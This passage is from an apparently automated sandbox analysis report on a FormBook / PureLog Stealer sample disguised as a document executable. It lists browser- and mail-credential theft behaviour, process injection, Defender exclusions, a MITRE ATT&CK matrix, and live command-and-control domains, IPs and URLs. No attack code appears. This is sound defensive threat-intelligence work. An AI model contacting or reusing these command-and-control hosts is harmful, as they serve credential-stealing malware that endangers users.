                Source: Yara matchFile source: 00000000.00000002.1414525368.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1414525368.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.5680000.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ed747c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2e935e0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.2ec6804.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.3119640.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.311b658.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Doc 1Z881A080453968203.exe.3118628.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1417000725.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1414525368.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1414525368.00000000030DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading                		312
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		21
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		11
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol11
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials13
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1436308 Sample: Doc 1Z881A080453968203.exe Startdate: 04/05/2024 Architecture: WINDOWS Score: 100 36 www.ty8yd.us 2->36 38 www.tehranrizcomputer.com 2->38 40 2 other IPs or domains 2->40 48 Snort IDS alert for network traffic 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for URL or domain 2->52 54 10 other signatures 2->54 10 Doc 1Z881A080453968203.exe 4 2->10         started        signatures3 process4 signatures5 58 Adds a directory exclusion to Windows Defender 10->58 13 Doc 1Z881A080453968203.exe 10->13         started        16 powershell.exe 23 10->16         started        18 Doc 1Z881A080453968203.exe 10->18         started        20 2 other processes 10->20 process6 signatures7 68 Maps a DLL or memory area into another process 13->68 22 ShWVPkMdEfalHck.exe 13->22 injected 70 Loading BitLocker PowerShell Module 16->70 25 conhost.exe 16->25         started        process8 signatures9 56 Found direct / indirect Syscall (likely to bypass EDR) 22->56 27 cttune.exe 13 22->27         started        process10 signatures11 60 Tries to steal Mail credentials (via file / registry access) 27->60 62 Tries to harvest and steal browser information (history, passwords, etc) 27->62 64 Modifies the context of a thread in another process (thread injection) 27->64 66 2 other signatures 27->66 30 ShWVPkMdEfalHck.exe 27->30 injected 34 firefox.exe 27->34         started        process12 dnsIp13 42 tehranrizcomputer.com 87.107.55.55, 49710, 49711, 49712 SINET-ASAccessServiceProviderIR Iran (ISLAMIC Republic Of) 30->42 44 www.ty8yd.us 91.195.240.123, 49709, 80 SEDO-ASDE Germany 30->44 46 www.coppercookwarekitchen.com 35.215.179.87, 49714, 49715, 49716 GOOGLE-2US United States 30->46 72 Found direct / indirect Syscall (likely to bypass EDR) 30->72 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Doc 1Z881A080453968203.exe63%ReversingLabsByteCode-MSIL.Trojan.SnakeKeyLogger
                Doc 1Z881A080453968203.exe65%VirustotalBrowse
                Doc 1Z881A080453968203.exe100%AviraHEUR/AGEN.1305452
                Doc 1Z881A080453968203.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                www.coppercookwarekitchen.com2%VirustotalBrowse
                www.ty8yd.us4%VirustotalBrowse
                tehranrizcomputer.com0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.ty8yd.us/gtit/?h2hLp=lXUTv2j8Xvb&6t=7JoAjWU6fcQ7CNTtX/U31Su9rRPUkr/mRT6nto1Tw/3EsD0jLMtc/bvrMEH2PX3CJD1RySmx+2JNj33ZBcO0uuHomTTQmPBBQgDcEfgCf/hj3/XBz9l0dPBO2TTZTjDWug==0%Avira URL Cloudsafe
                http://www.coppercookwarekitchen.com100%Avira URL Cloudmalware
                http://www.tehranrizcomputer.com/gtit/?6t=MgfHm/AWJcZtJWhW2C0E/J+QQ7KNY47B4fJU/YR8UcoonAYwvhq6NXdlvEESKTg86057McGoCNEDbpDsB8WVIewJXmm9gpc24T96Iv1w6gUl0XtnH9Aw4uL+4GJqM1s/fA==&h2hLp=lXUTv2j8Xvb0%Avira URL Cloudsafe
                http://www.tehranrizcomputer.com/gtit/0%Avira URL Cloudsafe
                http://www.coppercookwarekitchen.com/gtit/100%Avira URL Cloudmalware
                http://tehranrizcomputer.com/gtit/?6t=MgfHm/AWJcZtJWhW2C0E/J0%Avira URL Cloudsafe
                http://www.coppercookwarekitchen.com2%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.coppercookwarekitchen.com
                		35.215.179.87
                		truetrueunknown
                www.ty8yd.us
                		91.195.240.123
                		truetrueunknown
                tehranrizcomputer.com
                		87.107.55.55
                		truetrueunknown
                www.tehranrizcomputer.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.ty8yd.us/gtit/?h2hLp=lXUTv2j8Xvb&6t=7JoAjWU6fcQ7CNTtX/U31Su9rRPUkr/mRT6nto1Tw/3EsD0jLMtc/bvrMEH2PX3CJD1RySmx+2JNj33ZBcO0uuHomTTQmPBBQgDcEfgCf/hj3/XBz9l0dPBO2TTZTjDWug==true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tehranrizcomputer.com/gtit/true
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tehranrizcomputer.com/gtit/?6t=MgfHm/AWJcZtJWhW2C0E/J+QQ7KNY47B4fJU/YR8UcoonAYwvhq6NXdlvEESKTg86057McGoCNEDbpDsB8WVIewJXmm9gpc24T96Iv1w6gUl0XtnH9Aw4uL+4GJqM1s/fA==&h2hLp=lXUTv2j8Xvbtrue
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.coppercookwarekitchen.com/gtit/true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ac.ecosia.org/autocomplete?q=cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://duckduckgo.com/chrome_newtabcttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://duckduckgo.com/ac/?q=cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icocttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://www.coppercookwarekitchen.comShWVPkMdEfalHck.exe, 0000000F.00000002.2600975698.0000000000F63000.00000040.80000000.00040000.00000000.sdmpfalse
                          • 2%, Virustotal, Browse
                          • Avira URL Cloud: malware
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.ecosia.org/newtab/cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDoc 1Z881A080453968203.exe, 00000000.00000002.1414525368.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://tehranrizcomputer.com/gtit/?6t=MgfHm/AWJcZtJWhW2C0E/Jcttune.exe, 0000000E.00000002.2603455875.0000000005AE6000.00000004.10000000.00040000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2601998398.00000000033C6000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cttune.exe, 0000000E.00000003.2239960453.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      87.107.55.55
                                      		tehranrizcomputer.comIran (ISLAMIC Republic Of)
                                      		21341SINET-ASAccessServiceProviderIRtrue
                                      35.215.179.87
                                      		www.coppercookwarekitchen.comUnited States
                                      		19527GOOGLE-2UStrue
                                      91.195.240.123
                                      		www.ty8yd.usGermany
                                      		47846SEDO-ASDEtrue

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1436308
                                      Start date and time:2024-05-04 10:08:04 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 9s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:16
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:2
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:Doc 1Z881A080453968203.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@16/7@3/3
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 91%
                                      • Number of executed functions: 110
                                      • Number of non-executed functions: 276
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      10:08:52API Interceptor1x Sleep call for process: Doc 1Z881A080453968203.exe modified
                                      10:08:54API Interceptor16x Sleep call for process: powershell.exe modified
                                      10:10:45API Interceptor8x Sleep call for process: cttune.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      87.107.55.55ORDECHO-DD230007B.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.tehranrizcomputer.com/gtit/
                                      BB90730-1-IVPL-20240425.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.tehranrizcomputer.com/gtit/
                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                      • www.tehranrizcomputer.com/gtit/
                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                      • www.tehranrizcomputer.com/gtit/
                                      35.215.179.87ORDECHO-DD230007B.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.coppercookwarekitchen.com/gtit/
                                      BB90730-1-IVPL-20240425.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.coppercookwarekitchen.com/gtit/
                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                      • www.coppercookwarekitchen.com/gtit/
                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                      • www.coppercookwarekitchen.com/gtit/
                                      91.195.240.12300389692222221902.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.hylob.lat/s8o3/
                                      Udskriftsskemaernes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • www.l7aeh.us/udud/
                                      TC0931AC.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.01fdh.us/mx21/?7n=LJEx-t4H5n9P8X7&UL3=yKG1TlzGvGp/JW7Tmrzl324C9w99v+j9P53q1Z/aY35PbAx0sHB+F7ks9BYDOHNJWpP5++cLsA==
                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.qpdkg.lat/n8t5/
                                      Purchase Order For Consumables Eltra 888363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                      • www.5o8oh.us/se63/?Hp=NeA9ioaeSLrRSlvG6szFCSZvoQI75kGjr8WuiKIAWNTyDx5k+x4TjiCQvsl1HsulDw6h&CTaHzn=eTjPexUhcVql5T
                                      PO0427024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.cd14j.us/pq0o/
                                      PO#0425024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.cd14j.us/pq0o/
                                      Scan File_pdf.exeGet hashmaliciousFormBookBrowse
                                      • www.qpdkg.lat/n8t5/
                                      Purchase Order For Consumables Eltra 118363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                      • www.908511.vip/se63/?CL=9rU0Qt&J6Ahc=kfv/NnHIFeWQrZnu7LediMjqk6SrPDN21ZvCCR6aSLqjGBukh66VcsayCdE2SaNZ4KiW
                                      LF2024022.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • www.qcyu2.us/jn17/?AjFxkn=Bq/2DJzTq8GyJLkwA5BqZg2yiyGRqiJQQWY0GRrHspfbYtHey3nb4YHlWsmgz5myyHEh&R8=IzuxIh6

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      www.ty8yd.usCIPL 00429 EST DAFORMV CIELO Express.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 91.195.240.123
                                      CIPL 0429 EST DAFORMV CIELO Express.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 91.195.240.123
                                      ORDECHO-DD230007B.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 91.195.240.123
                                      BB90730-1-IVPL-20240425.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 91.195.240.123
                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                      • 91.195.240.123
                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                      • 91.195.240.123
                                      www.coppercookwarekitchen.comORDECHO-DD230007B.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 35.215.179.87
                                      BB90730-1-IVPL-20240425.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 35.215.179.87
                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                      • 35.215.179.87
                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                      • 35.215.179.87

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      GOOGLE-2UShttps://herozheng.com/Get hashmaliciousUnknownBrowse
                                      • 35.211.178.172
                                      https://wywljs.com/Get hashmaliciousUnknownBrowse
                                      • 35.211.178.172
                                      https://xdywna.com/Get hashmaliciousUnknownBrowse
                                      • 35.211.178.172
                                      https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQGet hashmaliciousHTMLPhisherBrowse
                                      • 35.208.249.213
                                      https://herozheng.com/Get hashmaliciousUnknownBrowse
                                      • 35.211.178.172
                                      https://wywljs.com/Get hashmaliciousUnknownBrowse
                                      • 35.211.178.172
                                      https://xdywna.com/Get hashmaliciousUnknownBrowse
                                      • 35.211.178.172
                                      SecuriteInfo.com.Win64.PWSX-gen.20556.23749.exeGet hashmaliciousFormBookBrowse
                                      • 35.213.232.35
                                      Sean Eichler.htmGet hashmaliciousUnknownBrowse
                                      • 35.211.178.172
                                      https://streamviewspan.com/~am~/index.phpGet hashmaliciousHTMLPhisherBrowse
                                      • 35.211.178.172
                                      SEDO-ASDEyKGpzHrsOp.ex_.bin.exeGet hashmaliciousBumbleBeeBrowse
                                      • 91.195.240.123
                                      yKGpzHrsOp.ex_.bin.exeGet hashmaliciousBumbleBeeBrowse
                                      • 91.195.240.123
                                      2024_04_005.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 91.195.240.19
                                      BE.exeGet hashmaliciousFormBookBrowse
                                      • 91.195.240.19
                                      shipping doc.exeGet hashmaliciousFormBookBrowse
                                      • 91.195.240.117
                                      PAYROLL.docGet hashmaliciousFormBookBrowse
                                      • 91.195.240.19
                                      Arrival Notice.docGet hashmaliciousFormBookBrowse
                                      • 91.195.240.19
                                      Purchase Order For Consumables Eltra 008363725_9645364782_1197653623_836652746_22994644.exeGet hashmaliciousFormBookBrowse
                                      • 91.195.240.19
                                      RFQ-LOTUS 2024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 91.195.240.19
                                      MOQ010524Purchase order.docGet hashmaliciousFormBookBrowse
                                      • 91.195.240.19
                                      SINET-ASAccessServiceProviderIRORDECHO-DD230007B.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 87.107.55.55
                                      BB90730-1-IVPL-20240425.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                      • 87.107.55.55
                                      VAT PO 24000042.exeGet hashmaliciousFormBookBrowse
                                      • 87.107.55.55
                                      SecuriteInfo.com.Trojan.Packed2.46654.20750.14267.exeGet hashmaliciousFormBookBrowse
                                      • 87.107.55.55
                                      Ly0ms78iom.elfGet hashmaliciousMiraiBrowse
                                      • 62.220.123.22
                                      TfpwQ763RO.elfGet hashmaliciousMirai, MoobotBrowse
                                      • 87.107.25.94
                                      TrQthsXaxM.elfGet hashmaliciousMiraiBrowse
                                      • 62.220.123.26
                                      g4FOBbCeOU.elfGet hashmaliciousMiraiBrowse
                                      • 62.220.123.22
                                      V0LJvpav7m.elfGet hashmaliciousMiraiBrowse
                                      • 62.220.123.19
                                      Rakitin.arm5.elfGet hashmaliciousMiraiBrowse
                                      • 62.220.123.11

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Doc 1Z881A080453968203.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\Doc 1Z881A080453968203.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):1172
                                      Entropy (8bit):5.354777075714867
                                      Encrypted:false
                                      SSDEEP:24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
                                      MD5:F614CCA1D985910D63FFFF70966F53F5
                                      SHA1:A9BD00A65E13088BD96A2420E289487CD07D9D4C
                                      SHA-256:3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
                                      SHA-512:AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
                                      Malicious:false
                                      Reputation:low
